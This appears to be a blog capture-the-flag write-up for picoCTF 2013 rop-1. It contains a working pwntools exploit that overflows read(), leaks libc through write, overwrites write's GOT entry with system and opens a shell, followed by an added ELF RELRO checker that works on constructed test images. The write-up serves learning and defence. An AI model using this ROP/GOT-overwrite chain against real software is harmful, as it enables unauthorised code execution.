CTF
pico-ctf-2013 rop-1
공부하자~~
2018. 7. 14. 22:10
1. The binary uses the write and read functions.
2. A buffer overflow in read() is exploited, and the challenge is solved with ROP.
Exploit code
```python
from pwn import *

# Addresses taken from the rop1 binary (no PIE, 32-bit)
read_plt  = 0x8048380
read_got  = 0x804a000
write_plt = 0x80483d0
write_got = 0x804a014
bss       = 0x804a024        # writable scratch area for "/bin/sh"
system_offset = 0x9ad60      # read - system in the target's libc
pppr = 0x804859d             # pop; pop; pop; ret  (cleans three arguments)
pr   = 0x8048364             # pop; ret            (cleans one argument)
binsh = b"/bin/sh"

p = process("./rop1-fa6168f4d8eba0eb")

payload  = b"A" * 140                 # overflow up to the saved return address
# 1) write(1, read_got, 4): leak the libc address of read
payload += p32(write_plt) + p32(pppr) + p32(1) + p32(read_got) + p32(4)
# 2) read(0, bss, 8): store "/bin/sh\0" in .bss
payload += p32(read_plt) + p32(pppr) + p32(0) + p32(bss) + p32(len(binsh) + 1)
# 3) read(0, write_got, 4): overwrite write's GOT entry with system
payload += p32(read_plt) + p32(pppr) + p32(0) + p32(write_got) + p32(4)
# 4) write@plt now resolves to system, so this is system(bss) == system("/bin/sh")
payload += p32(write_plt) + p32(pr) + p32(bss)

log.info("Exploit..!")
p.sendline(payload)

# The last 4 bytes printed are the leaked GOT entry of read
read_addr = u32(p.recv()[-4:])
log.info("read_addr = {}".format(hex(read_addr)))
system_addr = read_addr - system_offset
log.info("system_addr = {}".format(hex(system_addr)))

p.sendline(binsh)             # consumed by the read() in step 2
p.sendline(p32(system_addr))  # consumed by the read() in step 3
p.interactive()
```
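Step 3 of the chain above only works because the binary's GOT is still writable at run time; with Full RELRO (PT_GNU_RELRO segment plus bind-now) the GOT is remapped read-only after relocation and the write to write@GOT would fault. The following checker is an added example, not part of the original post: it classifies an ELF32 image's RELRO level the way checksec does, and `build_elf32` produces constructed, minimal header-only images (not real binaries) so it can be exercised offline.

```python
import struct

# ELF constants (System V ABI / glibc)
PT_DYNAMIC, PT_GNU_RELRO = 2, 0x6474E552
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

def relro_level(elf):
    """Classify a little-endian ELF32 image as 'none', 'partial' or 'full' RELRO:
    PT_GNU_RELRO present plus a bind-now flag in the dynamic section = full."""
    if elf[:5] != b"\x7fELF\x01":
        raise ValueError("not a 32-bit ELF image")
    phoff = struct.unpack_from("<I", elf, 28)[0]
    phentsize, phnum = struct.unpack_from("<HH", elf, 42)
    has_relro = bind_now = False
    for i in range(phnum):
        p_type, p_offset, _, _, p_filesz = struct.unpack_from("<5I", elf, phoff + i * phentsize)
        if p_type == PT_GNU_RELRO:
            has_relro = True
        elif p_type == PT_DYNAMIC:
            # Walk the dynamic entries (d_tag, d_val) until DT_NULL
            for off in range(p_offset, p_offset + p_filesz, 8):
                tag, val = struct.unpack_from("<iI", elf, off)
                if tag == DT_NULL:
                    break
                if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) \
                        or (tag == DT_FLAGS_1 and val & DF_1_NOW):
                    bind_now = True
    if not has_relro:
        return "none"
    return "full" if bind_now else "partial"

def build_elf32(relro, bind_now):
    """Constructed minimal ELF32 image (ELF header, program headers and a tiny
    dynamic section only; not loadable) with the requested hardening flags."""
    dyn = struct.pack("<iI", DT_FLAGS, DF_BIND_NOW if bind_now else 0)
    dyn += struct.pack("<iI", DT_NULL, 0)
    nph = 2 if relro else 1
    dyn_off = 52 + 32 * nph            # program headers follow the 52-byte ELF header
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", b"\x7fELF\x01\x01\x01", 3, 3, 1, 0, 52, 0, 0,
                       52, 32, nph, 0, 0, 0)
    phdrs = struct.pack("<8I", PT_DYNAMIC, dyn_off, 0, 0, len(dyn), len(dyn), 6, 4)
    if relro:
        phdrs += struct.pack("<8I", PT_GNU_RELRO, 0, 0, 0, 0, 0, 4, 1)
    return ehdr + phdrs + dyn
```

Run `relro_level(open(path, "rb").read())` on a real 32-bit binary to see whether a GOT-overwrite step like the one in this chain is even possible against it.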